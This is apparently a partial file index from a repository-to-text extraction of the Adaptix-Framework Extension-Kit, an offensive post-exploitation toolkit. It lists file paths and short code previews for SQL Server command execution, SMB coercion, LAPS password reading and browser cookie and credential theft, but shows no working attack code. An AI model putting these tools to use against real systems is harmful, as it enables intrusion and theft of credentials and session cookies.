"path": "AD-BOF/SQL-BOF/src/SQL/checkrpc/entry.c",
"chars": 2140,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CheckRpc(char *server, char *database, char *link, char *i"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/clr/entry.c",
"chars": 5946,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n#include \"sql_clr.c\"\n#include \"sql_modules.c\"\n\nvoid ExecuteClrAs"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/columns/entry.c",
"chars": 4312,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CheckTableColumns(char *server, char *database, char *link"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/databases/entry.c",
"chars": 2204,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CheckDatabases(char *server, char *database, char *link, c"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/impersonate/entry.c",
"chars": 1636,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CheckImpersonate(char *server, char *database, char *user,"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/info/entry.c",
"chars": 11860,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\n\ntypedef struct SQLINFO {\n char *ComputerName;\n char *DomainN"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/links/entry.c",
"chars": 1967,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CheckLinks(char *server, char *database, char *link, char "
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/olecmd/entry.c",
"chars": 6005,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n#include \"sql_modules.c\"\n\nvoid ExecuteOleCmd(char *server, char "
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/query/entry.c",
"chars": 2129,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CustomQuery(char *server, char *database, char *link, char"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/rows/entry.c",
"chars": 4794,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CheckTableRows(char *server, char *database, char *link, c"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/search/entry.c",
"chars": 2937,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid Search(char *server, char *database, char *link, char *imp"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/smb/entry.c",
"chars": 2947,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CoerceSmb(char *server, char *database, char *link, char *"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/tables/entry.c",
"chars": 2520,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CheckTables(char *server, char *database, char *link, char"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/togglemodule/entry.c",
"chars": 3007,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n#include \"sql_modules.c\"\n\nvoid ToggleRpc(char *server, char *dat"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/users/entry.c",
"chars": 2696,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid CheckUsers(char *server, char *database, char *link, char "
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/whoami/entry.c",
"chars": 4734,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n\nvoid FreeResults(char **results) {\n for (int i = 0; results[i]"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/xpcmd/entry.c",
"chars": 3979,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n#include \"sql_modules.c\"\n\nvoid ExecuteXpCmd(char *server, char *"
},
{
"path": "AD-BOF/SQL-BOF/src/common/base.c",
"chars": 7310,
"preview": "#include \"bofdefs.h\"\n#include \"beacon.h\"\n#include \"time.h\"\n#ifndef bufsize\n#define bufsize 8192\n#endif\n\n\nchar * output _"
},
{
"path": "AD-BOF/SQL-BOF/src/common/beacon.h",
"chars": 16443,
"preview": "/*\n * Beacon Object Files (BOF)\n * -------------------------\n * A Beacon Object File is a light-weight post exploitation"
},
{
"path": "AD-BOF/SQL-BOF/src/common/bofdefs.h",
"chars": 7869,
"preview": "#pragma once\n#pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen)\n#include <winsock2.h>\n#include <ws2tcpip.h>"
},
{
"path": "AD-BOF/SQL-BOF/src/common/sql.c",
"chars": 12090,
"preview": "#include \"bofdefs.h\"\n#include <sql.h>\n#include <windows.h>\n\nvoid ShowError(unsigned int handletype, const SQLHANDLE *han"
},
{
"path": "AD-BOF/SQL-BOF/src/common/sql_agent.c",
"chars": 4188,
"preview": "#include \"bofdefs.h\"\n#include \"sql.h\"\n\n\nBOOL IsAgentRunning(SQLHSTMT stmt, char* link, char* impersonate)\n{\n BOOL run"
},
{
"path": "AD-BOF/SQL-BOF/src/common/sql_clr.c",
"chars": 12137,
"preview": "//\n// imported by bof entry files utilizing CLR functionality\n// include statmenet should be after the sql.c include\n//\n"
},
{
"path": "AD-BOF/SQL-BOF/src/common/sql_modules.c",
"chars": 6639,
"preview": "//\n// imported by bof entry files to check or toggle status of modules\n// include statmenet should be after the sql.c in"
},
{
"path": "AD-BOF/WebDAVClient/EnableWebDAVClient.c",
"chars": 1468,
"preview": "#include <windows.h>\n#include <evntprov.h>\n#include \"beacon.h\"\n\n// EnableWebDAVClient Code based on https://pentestlab.b"
},
{
"path": "AD-BOF/WebDAVClient/LICENSE",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "AD-BOF/WebDAVClient/StatusWebDAVClient.c",
"chars": 1626,
"preview": "#include <windows.h>\n#include <stdio.h>\n#include \"beacon.h\"\n\nWINBASEAPI BOOL WINAPI KERNEL32$WaitNamedPipeA(LPCSTR lpNam"
},
{
"path": "AD-BOF/WebDAVClient/beacon.h",
"chars": 2909,
"preview": "/*\n * Beacon Object Files (BOF)\n * -------------------------\n * A Beacon Object File is a light-weight post exploitation"
},
{
"path": "AD-BOF/ad-services.axs",
"chars": 333,
"preview": "var metadata = {\n name: \"\",\n description: \"\",\n nosave: true\n};\n\nvar path = ax.script_dir();\nax.script_load(path"
},
{
"path": "AD-BOF/ad.axs",
"chars": 17042,
"preview": "var metadata = {\n name: \"AD-BOF\",\n description: \"Active Directory Exploitation BOFs\"\n};\n\n\n\nvar cmd_adwssearch = ax"
},
{
"path": "AD-BOF/adwssearch/adws_parser.h",
"chars": 82099,
"preview": "/*\n * adws_parser.h - ADWS Response Parser\n *\n * Functions for parsing ADWS/NBFSE responses including:\n * - Enumerate/Pu"
},
{
"path": "AD-BOF/adwssearch/adws_search.c",
"chars": 15035,
"preview": "#define SECURITY_WIN32\n#include \"beacon.h\"\n#include \"bofdefs.h\"\n#include <dsgetdc.h>\n#include <lm.h>\n#include <rpc.h>\n#i"
},
{
"path": "AD-BOF/adwssearch/nbfse.h",
"chars": 22389,
"preview": "/*\n * nbfse.h - .NET Binary Format: SOAP Encoding\n *\n * Functions for encoding SOAP messages in Microsoft's binary XML f"
},
{
"path": "AD-BOF/adwssearch/nmf.h",
"chars": 6373,
"preview": "/*\n * nmf.h - .NET Message Framing Protocol\n *\n * Functions for handling Microsoft's .NET Message Framing (NMF) protocol"
},
{
"path": "AD-BOF/adwssearch/nns.h",
"chars": 17885,
"preview": "/*\n * nns.h - .NET NegotiateStream Protocol\n *\n * Functions for handling .NET's NegotiateStream secure transport protoco"
},
{
"path": "AD-BOF/badtakeover/BadTakeover.c",
"chars": 5792,
"preview": "#include <windows.h>\n#include <winldap.h>\n#include <winber.h>\n#include <sddl.h>\n#include \"bofdefs.h\"\n#include \"beacon.h\""
},
{
"path": "AD-BOF/ldapsearch/base.c",
"chars": 5725,
"preview": "#include <windows.h>\n#include \"bofdefs.h\"\n#include \"beacon.h\"\n#ifndef bufsize\n#define bufsize 8192\n#endif\n\n\nchar * outpu"
},
{
"path": "AD-BOF/ldapsearch/ldapsearch.c",
"chars": 25397,
"preview": "#include <windows.h>\n#include <dsgetdc.h>\n#include <winldap.h>\n#include <winber.h>\n#include <rpc.h>\n#include <lm.h>\n#inc"
},
{
"path": "AD-BOF/readlaps/base.c",
"chars": 5725,
"preview": "#include <windows.h>\n#include \"bofdefs.h\"\n#include \"beacon.h\"\n#ifndef bufsize\n#define bufsize 8192\n#endif\n\n\nchar * outpu"
},
{
"path": "AD-BOF/readlaps/readlaps.c",
"chars": 10503,
"preview": "// Reference: https://github.com/xpn/RandomTSScripts/blob/master/lapsv2decrypt/bof/lapsv2decrypt.cpp\n\n#include <windows."
},
{
"path": "CMakeLists.txt",
"chars": 4072,
"preview": "cmake_minimum_required(VERSION 3.16)\nproject(ExtensionKit C CXX)\n\nset(CMAKE_C_STANDARD 99)\nset(CMAKE_CXX_STANDARD 11)\n\ns"
},
{
"path": "Creds-BOF/CMakeLists.txt",
"chars": 3035,
"preview": "cmake_minimum_required(VERSION 3.16)\n#project(Creds-BOF C)\n\nset(CMAKE_C_STANDARD 99)\n\n# Include directories\ninclude_dire"
},
{
"path": "Creds-BOF/Makefile",
"chars": 3188,
"preview": "CC64 = x86_64-w64-mingw32-gcc\nCC86 = i686-w64-mingw32-gcc\nSTRIP64 = x86_64-w64-mingw32-strip --strip-unneeded\nSTRIP86 = "
},
{
"path": "Creds-BOF/README.md",
"chars": 3021,
"preview": "# Creds-BOF\n\nBOF tools that can be used to harvest passwords.\n\n\n\n\n\n## askcreds\n\nA BOF tool that can be u"
},
{
"path": "Creds-BOF/UnderlayCopy/README.md",
"chars": 3513,
"preview": "# UnderlayCopy-BOF\n> #### Developed for [@Adaptix-Framework](https://github.com/Adaptix-Framework)\n<br>\n\nA low-level fil"
},
{
"path": "Creds-BOF/UnderlayCopy/entry.c",
"chars": 41642,
"preview": "#include <windows.h>\n#include <stdint.h>\n#include \"beacon.h\"\n#include \"bofdefs.h\"\n#include \"adaptix.h\"\n#include \"underla"
},
{
"path": "Creds-BOF/UnderlayCopy/underlaycopy.h",
"chars": 4105,
"preview": "#ifndef UNDERLAYCOPY_H\n#define UNDERLAYCOPY_H\n\n#include <windows.h>\n#include <stdint.h>\n\n// NTFS Constants\n#define MFT_R"
},
{
"path": "Creds-BOF/askcreds/askcreds.c",
"chars": 7404,
"preview": "#define SECURITY_WIN32\n\n#include <windows.h>\n#include <wincred.h>\n#include <security.h>\n\n#include \"askcreds.h\"\n#include "
},
{
"path": "Creds-BOF/askcreds/askcreds.h",
"chars": 3239,
"preview": "#pragma once\n\n#include <windows.h>\n#include <wincred.h>\n\n#define CREDUIWIN_GENERIC 0x1\n#define CREDUIWIN_CHECKBOX 0x2\n#d"
},
{
"path": "Creds-BOF/cookie-monster/LICENSE",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "Creds-BOF/cookie-monster/Makefile",
"chars": 396,
"preview": "all:\n\tx86_64-w64-mingw32-gcc -DBOF -c cookie-monster-bof.c -o cookie-monster-bof.x64.o -Wdiscarded-qualifiers -Wincompat"
},
{
"path": "Creds-BOF/cookie-monster/README.md",
"chars": 7607,
"preview": "# Cookie-Monster-BOF\nSteal browser cookies for edge, chrome and firefox through a BOF!\n\nCookie Monster BOF will extract "
},
{
"path": "Creds-BOF/cookie-monster/adaptix.h",
"chars": 182,
"preview": "#pragma once\n\n#include \"beacon.h\"\n\nDECLSPEC_IMPORT void AxAddScreenshot(char* note, char* data, int len);\nDECLSPEC_IMPOR"
},
{
"path": "Creds-BOF/cookie-monster/beacon.h",
"chars": 6759,
"preview": "/*\n * Beacon Object Files (BOF)\n * -------------------------\n * A Beacon Object File is a light-weight post exploitation"
},
{
"path": "Creds-BOF/cookie-monster/cookie-monster-bof.c",
"chars": 61206,
"preview": "#include <windows.h>\n#include <stdint.h> \n#include <ctype.h>\n#include <stdio.h>\n#include <tlhelp32.h>\n#include \"cookie-m"
},
{
"path": "Creds-BOF/cookie-monster/cookie-monster-bof.h",
"chars": 7374,
"preview": "#include <windows.h>\n\n#define SystemHandleInformation 0x10\n#define HANDLE_TYPE_FILE 37\n#define STATUS_INFO_LENGTH_MISMAT"
}
]
// ... and 244 more files (download for full content)
About this extraction
This page contains the full source code of the Adaptix-Framework/Extension-Kit GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 444 files (9.6 MB), approximately 2.5M tokens, and a symbol index with 4356 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.